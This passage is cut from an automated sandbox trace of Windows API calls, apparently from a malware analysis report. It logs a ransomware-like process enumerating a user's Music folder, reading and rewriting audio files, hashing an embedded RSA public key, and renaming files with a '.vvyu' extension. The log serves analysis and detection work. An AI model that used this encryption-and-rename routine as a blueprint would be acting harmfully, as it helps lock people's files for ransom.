(HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0197.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf7c0 | out: hHeap=0x2c0000) returned 1 [0197.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf9d8 | out: hHeap=0x2c0000) returned 1 [0197.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0197.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea920 | out: hHeap=0x2c0000) returned 1 [0197.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf5b0 | out: hHeap=0x2c0000) returned 1 [0197.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf3b8 | out: hHeap=0x2c0000) returned 1 [0197.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.839] WriteFile (in: hFile=0x584, lpBuffer=0x2ade6e0*, nNumberOfBytesToWrite=0xcc8, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ade6e0*, lpNumberOfBytesWritten=0x2f9fb14*=0xcc8, lpOverlapped=0x0) returned 1 [0197.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0197.840] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xccd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.840] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.841] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.842] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.842] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.842] CloseHandle (hObject=0x584) returned 1 [0197.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0197.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0197.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0197.844] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\dVUUTI6.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\dvuuti6.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\dVUUTI6.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\dvuuti6.wav.vvyu")) returned 1 [0197.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.846] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0197.850] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96daa2e0, ftCreationTime.dwHighDateTime=0x1d89dfc, ftLastAccessTime.dwLowDateTime=0x80d9d360, ftLastAccessTime.dwHighDateTime=0x1d89fac, ftLastWriteTime.dwLowDateTime=0x80d9d360, ftLastWriteTime.dwHighDateTime=0x1d89fac, nFileSizeHigh=0x0, nFileSizeLow=0x135e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f09xVKn7RNmgc_bZZ.m4a", cAlternateFileName="F09XVK~1.M4A")) returned 1 [0197.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0197.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.850] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\f09xVKn7RNmgc_bZZ.m4a") returned=".m4a" [0197.850] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\f09xVKn7RNmgc_bZZ.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\f09xvkn7rnmgc_bzz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.851] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=79329) returned 1 [0197.851] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.855] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x135bb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.855] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.858] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.858] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x135e1, lpOverlapped=0x0) returned 1 [0197.859] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.859] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.859] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.859] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0197.861] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.861] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.861] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.861] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.861] GetLastError () returned 0x0 [0197.861] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.861] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0197.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.862] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.862] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.862] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x135e0) returned 0x2af5168 [0197.862] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea920 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67e8 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea968 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6800 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6830 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6890 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6848 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.864] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0197.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6890 [0197.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0197.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6848 [0197.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6830 [0197.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0197.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0197.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0197.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0197.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.866] GetCurrentThreadId () returned 0x5d8 [0197.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2c00 [0197.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0197.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0197.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.867] GetCurrentThreadId () returned 0x5d8 [0197.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6890 [0197.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6830 [0197.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0197.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6848 [0197.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6818 [0197.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68a8 [0197.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0197.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6878 [0197.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6860 [0197.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.870] RtlAllocateHeap 